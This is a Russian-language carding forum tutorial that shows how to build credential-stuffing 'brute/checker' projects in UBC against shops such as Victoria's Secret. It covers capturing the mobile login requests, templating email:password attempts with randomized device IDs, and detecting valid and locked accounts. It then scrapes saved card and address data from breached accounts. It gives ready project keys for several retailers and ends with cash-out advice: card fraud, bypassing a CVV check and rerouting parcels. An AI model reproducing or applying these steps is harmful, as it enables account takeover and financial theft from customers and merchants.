Пишем сами бруты/чекеры (2018)

[blackedd]

Решил поделиться опытом как добывать свой мат и не тратиться на услуги кодеров. Это мой первый опыт написания статьи, так что не судите строго.
Я делаю бруты/чекеры под шопы, на которых есть сохраненные методы оплаты. Также можно искать сервисы с внутренними балансами или поинтами.
Идем в гугл и ищем то что нас интересует, я сделаю все на примере victoriassecret. Нашли мы интересующий нас шоп/сервис, идем на _ttp://pr-cy.ru/site-statistics/ и проверяем посещаемость сайта (чем выше посещаемость, тем больше шансов добыть кучу мата). У вики большая аудитория.

Также есть куча плагинов для браузера, я использую на хроме плагин IP Whois & Flags Chrome & Websites Rating .

Разведали инфу по сайту, регистрируем акк пустышку и смотрим есть ли платежки или внутренний баланс.
Если у сайта есть мобильное приложение, то лучше делать все через него. Устанавливаем на машину 2 софтины: Fiddler и Nox(я использую данный эмулятор). Далее идем в настройки фидлера, трогаем только эти 2 вкладки.


Запускаем командную строку и вводим ipconfig (узнаем свой локальный ип)

Далее запускаем нокс идем в настройки вайфай и прописываем прокси, свой локальный ип и порт 8888

Открываем браузер на ноксе и вписываем данный урл _ttp://ipv4.fiddler:8888/ , если все нормально, то увидите такого вида страницу.

Жмете на FiddlerRoot Certificate и добавляете сертификат фидлера (имя любое пишем).

Теперь у нас все готово для отлова запросов приложений, ищем и ставим приложение на нокс(если у сайта оно конечно есть). Я обычно качаю приложения с _ttps://apkpure.com/ , скачиваем и просто перетаскиваем файл на нокс, приложение установлено.
Запускаем приложение, вводим лог пасс и идем в фидлер смотреть запросы, ищем запрос где передаются наш емайл и пасс, жмем правой кнопкой на запрос и копируем хеадеры и пост данные справа.

Для удобства я подготавливаю все в блокноте, эти данные в хеадерах не нужны
Code:

cookie: vsSigninPrompt=true; acs.t=%7B%22_ckX%22%3A1516279578610%2C%22rid%22%3A  %22d427cef-110578618-1e79-827d-74214%22%2C%22cp%22%3A%7B%22url%22%3A%22https%3A%2  F%2Fwww.victoriassecret.com%2Faccount%2Fprofile%22  %2C%22T5%22%3A%22%22%2C%22T31%22%3A%22%22%2C%22T26  %22%3A%22%22%2C%22T19%22%3A%22%22%2C%22APP%22%3A%2  2%22%2C%22OMTR_BEACON%22%3A%22%22%2C%22terms%22%3A  %22%22%2C%22browser%22%3A%22Chrome%20Mobile%2030%2  2%2C%22os%22%3A%22Android%22%2C%22flash%22%3A%220%  22%2C%22hosted%22%3A%22false%22%2C%22referrer%22%3  A%22%22%2C%22site%22%3A%22victoriassecret.com%22%2  C%22trigger_version%22%3A%2219.0.32%22%2C%22pv%22%  3A%2211%22%2C%22locale%22%3A%22en%22%2C%22cxreplay  aws%22%3A%22true%22%7D%2C%22pl%22%3A1%2C%22pv%22%3  A11%2C%22def%22%3A2%2C%22phonepv%22%3A11%2C%22rc%2  2%3A%22true%22%2C%22grft%22%3A1508505886161%2C%22m  id%22%3A%22d427cef-110589086-eaa2-ee5f-99ac3%22%2C%22rt%22%3Atrue%2C%22cncl%22%3Afalse%2C  %22rpid%22%3A%22d427cef-110589086-d3c5-067a-8fbbc%22%7D; UID=b713ae4c-4db7-4927-86d9-84d2c616c846; vsPopUnder=true; utag_main=v_id:015f39d1cefb0053d36973af52dc0009000  2008800556$_sn:3$_ss:1$_st:1512319649457$_pn:1%3Be  xp-session$ses_id:1512317849457%3Bexp-session; _ga=GA1.2.1551765116.1508503577; _gid=GA1.2.1841430884.1512317851; _uetsid=_uet72224107; RES_TRACKINGID=852902994723990; ResonanceSegment=1; RES_SESSIONID=841913862852379; vsrt=; dcc=Himalia

Content-Length: 60

Host: www.victoriassecret.com

Connection: Keep-Alive

очищаем от ненужного и получается так:

Все у нас готово. Теперь приступим к созданию брута/чекера. Кто-то использует для написания private keeper, я предпочтение отдаю UBC (пользуюсь с самого появления софта в бесплатной версии, по мне он не жрет так ресурсы как кипер и есть все необходимые инструменты)
Запускаем софт, авторизуемся и идем в менеджер проектов .

Создаем новый проект.

Жмем на первую строчку в левом верхнем углу и вставляем наши данные.

В заголовки вставляем все кроме юзерагента, он прописывается ниже отдельно.
HTML Code:

deviceId: b0c09069cc9b$random[1111-9999]$

VSAPPTYPE: ANDROIDHANDHELD

VSAPPVERSION: 5.2.6

Accept: application/json

Content-Type: application/json; charset=UTF-8

Accept-Encoding: gzip

В девайсид я сделал рандомизацию последних 4 цифр(эмулируем разные устройства)
В валидацию для начала пишем HTTP
пост данные заменяем на теги, мыло на $email$ и пасс на $pass$
Code:

{"password":"$pass$","username":"$email$"}

Жмем тестировать и вписываем свой мыло:пасс ну и начать:

смотрим в обработке ответа ответ сервера, он у нас совпадает с ответом сервера в фидлере, значит все нормально авторизация проходит, делаем ошибку в пароле,чтобы определить ответ сервера на неверный пароль.

Теперь берем данные и вписываем в валидацию страницы и определение гуда/бэда.

В бэде я еще прописал ответ сервера если акк в локе, получилось так:
Code:

errorMessageList":["We do not recognize your sign-in information

errorMessageList":["Your account has been locked temporarily

Брут у нас готов, теперь сделаем чек на карту и другие данные(чтобы сделать чек надо сначала пробрутить базу и найти гуды, желательно 10-20, зависит от сервиса, гдето много акков с сс а гдето редкость, нашли гуды, чекаем руками акки на наличие карт иидем дальше к чекеру)
Идем снова в нокс и в переходим в профиле, видим в фидлере запрос и копируем также хеадеры как в первом случае:

Вставляем все данные с этого запроса, в заголовках я также сделал рандомизацию:
Code:

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

appdeviceid: YjBjMDkwNjljYzliMzE4MmNvbS52aWN0b3Jp$random_ABC_ab  c[5-5]$WNyZXQudnNhYQ==

vsapptype: ANDROIDHANDHELD

Accept-Encoding: gzip,deflate

Accept-Language: en-US

У нас получается так, в пункте выполнять при условиях пишем Good(чтобы при бэде у нас не было лишнего запроса)

В фидлере в ответе сервера ищем данные которые мы хотим спарсить, нашли в коде сс.

Теперь идем в УБЦ и в парсере значений жмем добавить, парсить будем от ccType":" до ","selectedShipMethod

Опять тестируем проект и видим, что все у нас парсится нормально:

По аналогии парсим другие нужные нам данные, я парсил адрес, на скрине видно откуда и до куда парсим, ну и в другую переменную данные будем парсить.

тестируем проект и проверяем все ли парсится
Далее сделаем условия, чтобы если сс есть на акке выводило в счетчик и сохраняло в отдельный файл
В список счетчиков добавляем свой счетчик, назовем его СС, получится у нас так:
Code:

Good

Bad

$

CC

В условиях добавляем условие, сс мы парсили в $value1$ значит если $value1[1]$ не равно пустоте, то мы сохраняем акк в отдельный файл и будем использовать дополнительный лог, а также наш счетчик СС увеличиваем на 1.

Теперь сделаем как мы хотим чтобы был лог в файле, я сделал так:
Code:

$email$:$pass$

====CARD====

$value1all$

====ADDRESS====

$value2all$

---------------------------------------

Почему я написал all на конце, это чтобы выводило все найденые значения.

Еще в поле валидации страницы пропишем любой код валидной страницы, например <title>Your Account - Victoria's Secret</title>.

Окончательно тестируем проект и проверяем выполняются ли наши условия.

Если у нас все нормально то сохраняем проект и идем в список ваших проектов и запускаем, идем курим, делаем дела и ждем когда насобирается урожай.
Ну а далее берем акки в результатах, идем на дед под штат акка и бьем.

Я написал на примере данного шопа, все делается по аналогии на другие сервисы. Если нет приложения у сайта, то снифаем запросы в браузере. Опыт придет со временем.
Ключи проектов для добавления в UBC:
Code:

Victoriasecret - ZFtVbWU1NHpcWjg4UUdNO05xenRpS11zZDVIQA==

И еще бонус вам:

qvc(brute/checker) - ZFtVbWU1NHpcWjg4UUdNO05xenRpS0k1XDQ8V1ZZVUk=

macys(brute/checker) - ZFtVbWU1NHpcWjg4UUdNO05xenRpSjRrXDZvfQ==

overstock(brute) - ZFtVbWU1NHpcWjg4UUdNO05xenRpSjw1XVtNfWdKPG1kekBA

Всем добра и профита. С наступающим Новым Годом. Чтобы Новый год принес больше профита и осуществил ваши мечты.
Добавлю инфу по вбиву в qvc. В этом шопе отлично делают рероут паков.(кто не в курсе это перенаправление пака с билл адреса на нужный вам адрес, сейчас много прозвон сервисов кто занимается рероутом, цены везде разные)
При вбиве на билл адрес бывает вылазит цвв на привязаных сс, так вот в qvc есть кнопка "Speed Buy", жмем ее и если сс живая и на ней есть бабки, то ордер успешно оформится.
(c) buket